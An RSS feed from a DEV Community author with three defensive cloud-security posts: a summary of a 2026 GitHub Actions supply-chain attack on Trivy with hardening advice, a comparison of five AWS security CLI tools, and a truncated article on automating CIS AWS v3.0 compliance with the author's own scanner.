<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Mariusz Gębala</title>
    <description>The latest articles on DEV Community by Mariusz Gębala (@haitmg).</description>
    <link>https://dev.to/haitmg</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3798861%2F0f78162d-f1c3-4c7b-9cc3-9a58231a066c.png</url>
      <title>DEV Community: Mariusz Gębala</title>
      <link>https://dev.to/haitmg</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/haitmg"/>
    <language>en</language>
    <item>
      <title>12 Steps to Secure GitHub Actions After the Trivy Attack</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 15 Apr 2026 11:32:48 +0000</pubDate>
      <link>https://dev.to/haitmg/12-steps-to-secure-github-actions-after-the-trivy-attack-1l8h</link>
      <guid>https://dev.to/haitmg/12-steps-to-secure-github-actions-after-the-trivy-attack-1l8h</guid>
      <description>&lt;p&gt;In March 2026, attackers compromised Trivy - one of the most popular open-source vulnerability scanners - through its GitHub Action. They force-pushed 75 of 76 version tags to malicious commits. AWS credentials, GCP tokens, SSH keys - stolen from every workflow that ran the compromised action. Within five days, the attack cascaded to Docker Hub, VS Code extensions, and PyPI (&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2026-33634" rel="noopener noreferrer"&gt;CVE-2026-33634&lt;/a&gt;, CVSS 9.4).&lt;/p&gt;

&lt;p&gt;Most teams heard about this in isolation. It wasn't isolated.&lt;/p&gt;

&lt;p&gt;I traced the full chain back 16 months - from a Personal Access Token accidentally committed in a SpotBugs workflow (November 2024), through the &lt;a href="https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-tj-actionschanged-files-cve-2025-30066-and-reviewdogaction" rel="noopener noreferrer"&gt;tj-actions/changed-files&lt;/a&gt; mass compromise targeting Coinbase (March 2025, CVE-2025-30066), the AI-augmented Nx/s1ngularity attack (August 2025), and the GhostAction campaign that stole 3,325 secrets from 817 repositories (September 2025) - all the way to the Trivy/TeamPCP attack and the concurrent prt-scan campaign using AI-generated payloads.&lt;/p&gt;

&lt;p&gt;The pattern is clear: &lt;strong&gt;the pipeline is not the target - your AWS account is.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Every one of these attacks specifically went after cloud credentials. The Trivy payload queried the AWS Instance Metadata Service at &lt;code&gt;169.254.169.254&lt;/code&gt; and the ECS task metadata endpoint at &lt;code&gt;169.254.170.2&lt;/code&gt;. It wasn't looking for GitHub tokens.&lt;/p&gt;

&lt;p&gt;SHA pinning would have stopped the Trivy attack. But SHA pinning is step 1 of 12.&lt;/p&gt;

&lt;p&gt;In the full article, I cover:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;A complete timeline&lt;/strong&gt; of CI/CD supply chain attacks from November 2024 to March 2026&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;12 concrete hardening steps&lt;/strong&gt; with copy-paste YAML and Terraform code - from SHA pinning and OIDC setup to egress monitoring with StepSecurity Harden-Runner&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;A prevention matrix&lt;/strong&gt; showing which step would have stopped which attack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What GitHub is building next&lt;/strong&gt; - the 2026 Actions Security Roadmap (dependency locking, native egress firewall, immutable actions)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://haitmg.pl/blog/github-actions-security-after-trivy-attack/" rel="noopener noreferrer"&gt;Read the full article with all 12 steps, code examples, and sources&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://haitmg.pl/blog/github-actions-security-after-trivy-attack/" rel="noopener noreferrer"&gt;haitmg.pl&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>github</category>
      <category>aws</category>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>5 Open-Source AWS Security CLI Tools Worth Trying in 2026</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Wed, 01 Apr 2026 20:41:15 +0000</pubDate>
      <link>https://dev.to/haitmg/5-open-source-aws-security-cli-tools-worth-trying-in-2026-med</link>
      <guid>https://dev.to/haitmg/5-open-source-aws-security-cli-tools-worth-trying-in-2026-med</guid>
      <description>&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;p&gt;In the context of security, even today, there's a shortage of tools for everything. &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt; has a ton of checks. &lt;a href="https://github.com/aquasecurity/trivy" rel="noopener noreferrer"&gt;Trivy&lt;/a&gt; is the most well-known tool for containers and clouds. &lt;a href="https://github.com/BishopFox/cloudfox" rel="noopener noreferrer"&gt;CloudFox&lt;/a&gt; is a tool for pentesters. &lt;a href="https://github.com/DenizParlak/heimdall" rel="noopener noreferrer"&gt;Heimdall&lt;/a&gt; focuses on IAM privilege escalation. &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; correlates findings, assembles them into a single attack chain, and provides fixes for implementation via Terraform or the CLI.&lt;/p&gt;

&lt;p&gt;There's something for everyone - it's important to choose the right one for your work style.&lt;/p&gt;




&lt;h2&gt;
  
  
  The landscape
&lt;/h2&gt;

&lt;p&gt;Have you ever wondered that in today's technological age, a tool that could do everything for us would be useful? You know, literally everything. We'll wake up in the morning and an automatically generated list will appear on our laptop, like, "Do this project today, use this AI agent, and then we'll post it here and there - it will bring you success, fame, and money." However, I now believe that even the most refined LLM model won't replace creativity and real human needs.&lt;/p&gt;

&lt;p&gt;Based on the above, I've concluded that security scanning in AWS isn't as straightforward as it seems. Let's answer the question together - do you know what you want to check and what to do with the results provided in the report?&lt;/p&gt;

&lt;p&gt;There are tools that optimize the overview of our environment in terms of breadth - scanning 500+ rules across multiple clouds. Others, however, prepare information for depth optimization, searching in a smaller area but with much greater depth. Still others try to combine both horizons as optimally as possible. Is it possible to create a perfect tool that is free of noise and precisely meets the requirements of every administrator? In my opinion, no.&lt;/p&gt;

&lt;p&gt;In this article, I'd like to present five CLI tools that I've personally tested, so I hope to provide an unbiased opinion on them (all as of April 2, 2026). If you want a deeper dive into how Prowler and ScoutSuite stack up against cloud-audit, I wrote a &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;detailed comparison on my blog&lt;/a&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Prowler
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; over 13k | &lt;strong&gt;Checks:&lt;/strong&gt; &amp;gt;550 (AWS) | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;prowler-cloud/prowler&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;pip install prowler&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Anyone responsible for AWS environment security (and others) is likely familiar with Prowler. It's by far the most popular open-source scanner. 572 AWS checks across 84 services and 41 compliance standards (CIS, SOC 2, HIPAA, PCI-DSS, NIST 800-53, and many more). If your auditor asks, "Are you using Prowler?" - that's a sign that it's popular.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The widest range of compliance among all OSS tools&lt;/li&gt;
&lt;li&gt;Multi-cloud: AWS, Azure, GCP, Kubernetes, and others&lt;/li&gt;
&lt;li&gt;Active development, large community, commercial support&lt;/li&gt;
&lt;li&gt;HTML, CSV, JSON-OCSF, SARIF output&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where are the shortcomings:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scan time: 10-30 minutes on a standard account (572 checks take time)&lt;/li&gt;
&lt;li&gt;Attack path detection exists, but requires Prowler App (self-hosted Docker Compose + Neo4j + Cartography) or paid SaaS. The standard Prowler AWS CLI provides only simple results&lt;/li&gt;
&lt;li&gt;Remediation is performed using text hints, not copy-and-paste commands&lt;/li&gt;
&lt;li&gt;572 findings can be cumbersome - you need to know which ones are relevant&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Compliance-focused teams that need to check the box for CIS/SOC 2/HIPAA/PCI-DSS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;prowler
prowler aws
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  2. Trivy
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt; 34k | &lt;strong&gt;AWS Checks:&lt;/strong&gt; ~350-450 | &lt;strong&gt;Language:&lt;/strong&gt; Go&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/aquasecurity/trivy" rel="noopener noreferrer"&gt;aquasecurity/trivy&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;brew install trivy&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;This is an interesting resource. Trivy was initially designed for container vulnerability scanning, but later expanded to include cloud misconfiguration scanning. A key differentiator is the single binary that covers everything - container images, IaC files (Terraform, CloudFormation), Kubernetes, SBOM, licenses, and active AWS accounts.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A single binary covers containers + IaC + cloud + secrets + SBOM&lt;/li&gt;
&lt;li&gt;Fast, Go-based&lt;/li&gt;
&lt;li&gt;Huge community (34k stars)&lt;/li&gt;
&lt;li&gt;CycloneDX and SPDX output for supply chain&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AWS cloud scanning seems secondary to container scanning&lt;/li&gt;
&lt;li&gt;No attack chain detection - no correlation between findings&lt;/li&gt;
&lt;li&gt;Links to documentation pages for fixes, no CLI/Terraform output&lt;/li&gt;
&lt;li&gt;AWS CIS compliance limited to versions 1.2 and 1.4 (not 3.0)&lt;/li&gt;
&lt;li&gt;The March 2026 supply chain attack (trivy's GitHub Action was compromised for about 12 hours) raised trust issues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Teams already using Trivy for containers and want a single tool for everything.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trivy aws &lt;span class="nt"&gt;--region&lt;/span&gt; eu-central-1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  3. CloudFox
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;2300 | &lt;strong&gt;Commands:&lt;/strong&gt; 24 AWS enumeration modules | &lt;strong&gt;Language:&lt;/strong&gt; Go&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/BishopFox/cloudfox" rel="noopener noreferrer"&gt;BishopFox/cloudfox&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;brew install cloudfox&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Here we're dealing with a slightly different type of tool. This isn't a typical scanner, it's a tool for cloud penetration testers. It's a reconnaissance tool that enumerates what an attacker with given credentials can actually do - which roles to assume, which secrets to read, which instances to reach.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it excels at:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An attacker's perspective, not a defender's checklist&lt;/li&gt;
&lt;li&gt;Enumeration across accounts and services&lt;/li&gt;
&lt;li&gt;Generates "loot files" - ready-to-use commands that an attacker could run&lt;/li&gt;
&lt;li&gt;Good for red teams/penetration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No checks, no rules, no findings - just raw enumeration data&lt;/li&gt;
&lt;li&gt;No suggestions for remediation or fixes&lt;/li&gt;
&lt;li&gt;No compliance framework&lt;/li&gt;
&lt;li&gt;No HTML/PDF reports - just table and CSV output&lt;/li&gt;
&lt;li&gt;Requires manual analysis to connect facts to attack paths&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Penetration testers and red teams assessing what can actually be accessed with permissions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cloudfox aws &lt;span class="nt"&gt;--profile&lt;/span&gt; target-account all-checks
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  4. Heimdall
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;140 | &lt;strong&gt;Patterns:&lt;/strong&gt; &amp;gt;50 IAM escalations, &amp;gt;85 attack chains | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/DenizParlak/heimdall" rel="noopener noreferrer"&gt;DenizParlak/heimdall&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; from source (&lt;code&gt;pip install -e .&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;Heimdall primarily focuses on IAM privilege escalation. It checks whether a user with limited privileges could accidentally become an administrator. It maps trust relationships between IAM roles, policies, and services to find multi-hop escalation paths (A assumes B, B has a PassRole to C, C is an administrator).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Focuses on a difficult problem (privilege escalation) that most scanners miss&lt;/li&gt;
&lt;li&gt;Over 85 attack chain patterns with MITRE ATT&amp;amp;CK mapping&lt;/li&gt;
&lt;li&gt;Multi-hop detection (not just direct admin access)&lt;/li&gt;
&lt;li&gt;Interactive terminal user interface&lt;/li&gt;
&lt;li&gt;Ability to scan Terraform before deployment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Last commit: December 2025 (appears outdated)&lt;/li&gt;
&lt;li&gt;No pip installation - cloning and installing from source required&lt;/li&gt;
&lt;li&gt;Lack of compliance frameworks (CIS, SOC 2, etc.)&lt;/li&gt;
&lt;li&gt;No remediation commands&lt;/li&gt;
&lt;li&gt;Small community (146 stars, 4 commits)&lt;/li&gt;
&lt;li&gt;AWS only&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; IAM-focused security reviews where the question "who can become an admin?" needs to be answered.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/DenizParlak/heimdall
&lt;span class="nb"&gt;cd &lt;/span&gt;heimdall &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;
heimdall scan
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  5. cloud-audit
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Stars:&lt;/strong&gt; &amp;gt;30 | &lt;strong&gt;Checks:&lt;/strong&gt; 80 | &lt;strong&gt;Language:&lt;/strong&gt; Python&lt;br&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;gebalamariusz/cloud-audit&lt;/a&gt;&lt;br&gt;
&lt;strong&gt;Install:&lt;/strong&gt; &lt;code&gt;pip install cloud-audit&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;Website:&lt;/strong&gt; &lt;a href="https://haitmg.pl/cloud-audit/" rel="noopener noreferrer"&gt;haitmg.pl/cloud-audit&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I created this tool. I tried to gather everything I needed most for my work. I used to conduct the same security reviews at AWS, but I was missing one tool that would truly streamline my work, hence the idea. I needed a scanner that would show how findings connect to actual attack paths, not just a flat list.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it does well:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;20 attack chain rules that correlate findings (e.g., public SG + IMDSv1 + admin role = account takeover path)&lt;/li&gt;
&lt;li&gt;Each finding includes AWS CLI + Terraform remediation code, not just descriptions&lt;/li&gt;
&lt;li&gt;Compliance with AWS CIS v3.0 (62 checks) and SOC 2 Type II (43 criteria) with evidence for each check&lt;/li&gt;
&lt;li&gt;Breach cost estimation per finding and attack chain (sources cited: IBM, Verizon DBIR)&lt;/li&gt;
&lt;li&gt;Scan diff to track drift between runs&lt;/li&gt;
&lt;li&gt;MCP server for AI agent integration (Claude, Cursor)&lt;/li&gt;
&lt;li&gt;Under 60 seconds on a standard account&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Where it falls short:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;80 checks compared to 572 in Prowler - smaller coverage&lt;/li&gt;
&lt;li&gt;AWS only&lt;/li&gt;
&lt;li&gt;Small community (31 stars)&lt;/li&gt;
&lt;li&gt;Newer and less battle-tested&lt;/li&gt;
&lt;li&gt;No multi-cloud&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt; Teams that need fewer, high-signal findings with attack context and ready-to-paste fixes.&lt;/p&gt;

&lt;p&gt;If you want to see it in action, here's a &lt;a href="https://www.youtube.com/watch?v=G6xvLcAh71M" rel="noopener noreferrer"&gt;4-minute walkthrough on YouTube&lt;/a&gt; where I scan a real AWS account and find 3 attack chains.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan &lt;span class="nt"&gt;-R&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Side-by-side comparison
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Prowler&lt;/th&gt;
&lt;th&gt;Trivy&lt;/th&gt;
&lt;th&gt;CloudFox&lt;/th&gt;
&lt;th&gt;Heimdall&lt;/th&gt;
&lt;th&gt;cloud-audit&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;AWS checks&lt;/td&gt;
&lt;td&gt;572&lt;/td&gt;
&lt;td&gt;~400&lt;/td&gt;
&lt;td&gt;24 commands&lt;/td&gt;
&lt;td&gt;50+ patterns&lt;/td&gt;
&lt;td&gt;80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Attack chains&lt;/td&gt;
&lt;td&gt;App only&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes (85+)&lt;/td&gt;
&lt;td&gt;Yes (20)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remediation&lt;/td&gt;
&lt;td&gt;Text&lt;/td&gt;
&lt;td&gt;Doc links&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;CLI + Terraform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Compliance&lt;/td&gt;
&lt;td&gt;41 frameworks&lt;/td&gt;
&lt;td&gt;CIS 1.2/1.4&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;MITRE only&lt;/td&gt;
&lt;td&gt;CIS v3.0, SOC 2&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-cloud&lt;/td&gt;
&lt;td&gt;Yes (12+)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (3)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scan time&lt;/td&gt;
&lt;td&gt;10-30 min&lt;/td&gt;
&lt;td&gt;2-5 min&lt;/td&gt;
&lt;td&gt;1-3 min&lt;/td&gt;
&lt;td&gt;1-2 min&lt;/td&gt;
&lt;td&gt;&amp;lt;60 sec&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Output&lt;/td&gt;
&lt;td&gt;HTML, CSV, SARIF, JSON&lt;/td&gt;
&lt;td&gt;Table, SARIF, SPDX&lt;/td&gt;
&lt;td&gt;Table, CSV, JSON&lt;/td&gt;
&lt;td&gt;SARIF, CSV, JSON&lt;/td&gt;
&lt;td&gt;HTML, SARIF, JSON, MD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cost estimation&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  What I would actually use
&lt;/h2&gt;

&lt;p&gt;For a compliance audit: &lt;strong&gt;Prowler&lt;/strong&gt;. Nothing else comes close on framework coverage.&lt;/p&gt;

&lt;p&gt;For a pentest: &lt;strong&gt;CloudFox&lt;/strong&gt;. It thinks like an attacker.&lt;/p&gt;

&lt;p&gt;For container + cloud in one pipeline: &lt;strong&gt;Trivy&lt;/strong&gt;. Single binary, single CI step.&lt;/p&gt;

&lt;p&gt;For a quick "what can an attacker actually do with my account": &lt;strong&gt;cloud-audit&lt;/strong&gt; or &lt;strong&gt;Heimdall&lt;/strong&gt;. Depends on whether you want IAM escalation depth (Heimdall) or broader attack chains with fixes (cloud-audit).&lt;/p&gt;

&lt;p&gt;There is no reason to pick just one. I run Prowler for compliance evidence and cloud-audit for the attack chain context and fix code. They complement each other.&lt;/p&gt;

&lt;p&gt;If you're looking for a more detailed breakdown of how these tools compare on specific AWS security checks, I covered that in my &lt;a href="https://haitmg.pl/blog/aws-security-scanners-compared/" rel="noopener noreferrer"&gt;AWS Security Scanners Compared&lt;/a&gt; article. And if you're setting up security scanning in CI/CD, check out the &lt;a href="https://haitmg.pl/blog/aws-security-audit-checklist/" rel="noopener noreferrer"&gt;AWS Security Audit Checklist&lt;/a&gt; for a step-by-step approach.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Tools and star counts verified as of April 2026. Check each project's GitHub for the latest.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>opensource</category>
      <category>devops</category>
    </item>
    <item>
      <title>CIS AWS v3.0 in 60 Seconds: Automate Compliance with Terraform</title>
      <dc:creator>Mariusz Gębala</dc:creator>
      <pubDate>Fri, 27 Mar 2026 11:00:21 +0000</pubDate>
      <link>https://dev.to/haitmg/cis-aws-v30-in-60-seconds-automate-compliance-with-terraform-54d3</link>
      <guid>https://dev.to/haitmg/cis-aws-v30-in-60-seconds-automate-compliance-with-terraform-54d3</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; I've implemented a compliance engine into the &lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; tool that maps 62 CIS AWS v3.0 controls to automated checks with per-control Terraform remediation. Simply run &lt;code&gt;cloud-audit scan --compliance cis_aws_v3&lt;/code&gt; to quickly obtain the results. The HTML report clearly describes which controls passed and which failed, and also provides Terraform code snippets for quick fixes. 55 of the 62 controls are fully automated. Disclosure: I am the author of cloud-audit.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is the CIS AWS Foundations Benchmark?
&lt;/h2&gt;

&lt;p&gt;The &lt;a href="https://www.cisecurity.org/benchmark/amazon_web_services" rel="noopener noreferrer"&gt;CIS Amazon Web Services Foundations Benchmark&lt;/a&gt; is a comprehensive list of security configuration recommendations published by the Center for Internet Security. Version 3.0.0 includes 62 recommendations that define the baseline security posture every AWS account should meet. Generally, this is the most frequently cited AWS security standard, often used during audits, and is certainly required by compliance programs such as ISO 27001, SOC 2, and BSI C5.&lt;/p&gt;

&lt;h2&gt;
  
  
  The problem with CIS compliance today
&lt;/h2&gt;

&lt;p&gt;Are you preparing for your first audit? Or perhaps you've already experienced it firsthand? Simply put, you open a 200-page PDF and just want to pass the certification audit. You have to manually review every control element, navigate the AWS console from left to right, top to bottom, run a multitude of CLI commands (not everything is easily accessible from the console), and finally, record all your observations in Excel. Sounds like a "very interesting" job, right? If you have 62 of these controls, you can safely assume you'll have 2-3 days off.&lt;/p&gt;

&lt;p&gt;An audit arrives. The auditor asks, "Show me the proof for control element 3.4." You think, "It's already happening." I had it on my screenshot number 248. Either you have a brilliant mind and remember everything, or it will take you another few days to point out all this evidence for the auditor.&lt;/p&gt;

&lt;p&gt;And you're probably guessing that I'm not the first person to have the idea - we need to automate this. &lt;a href="https://docs.aws.amazon.com/securityhub/latest/userguide/cis-aws-foundations-benchmark.html" rel="noopener noreferrer"&gt;AWS Security Hub&lt;/a&gt; maps 37 controls. &lt;a href="https://github.com/prowler-cloud/prowler" rel="noopener noreferrer"&gt;Prowler&lt;/a&gt; all of them. However, none of them answer the question of how to fix them (at least not by copy-pasting).&lt;/p&gt;

&lt;p&gt;I've participated in security audits in my life, including those involving AWS. This definitely inspired me to work on fully automating this process.&lt;/p&gt;

&lt;h2&gt;
  
  
  What CIS AWS v3.0 actually requires
&lt;/h2&gt;

&lt;p&gt;The CIS AWS Foundations Benchmark v3.0.0 has 62 recommendations across 5 sections:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Section&lt;/th&gt;
&lt;th&gt;Controls&lt;/th&gt;
&lt;th&gt;What it covers&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1 - Identity and Access Management&lt;/td&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;Root MFA, password policies, access keys, IAM roles, Access Analyzer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2 - Storage&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;S3 encryption, public access blocks, RDS encryption, EFS encryption&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3 - Logging&lt;/td&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;CloudTrail, AWS Config, VPC flow logs, S3 object-level logging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4 - Monitoring&lt;/td&gt;
&lt;td&gt;16&lt;/td&gt;
&lt;td&gt;CloudWatch metric filters + alarms for 15 event categories + Security Hub&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5 - Networking&lt;/td&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Security groups, NACLs, default SG, IMDSv2&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Of these 62, &lt;strong&gt;55 are automatable&lt;/strong&gt; via AWS API calls. 7 require manual review (console-only settings, organizational decisions).&lt;/p&gt;

&lt;h2&gt;
  
  
  Automating the benchmark
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/gebalamariusz/cloud-audit" rel="noopener noreferrer"&gt;cloud-audit&lt;/a&gt; v1.1.0 includes a compliance engine that maps all 62 CIS AWS Foundations Benchmark v3.0 controls to automated checks:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;cloud-audit
cloud-audit scan &lt;span class="nt"&gt;--compliance&lt;/span&gt; cis_aws_v3
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output shows a per-control table with PASS, FAIL, PARTIAL, or N/A for each of the 62 controls:&lt;br&gt;
&lt;/p&gt;

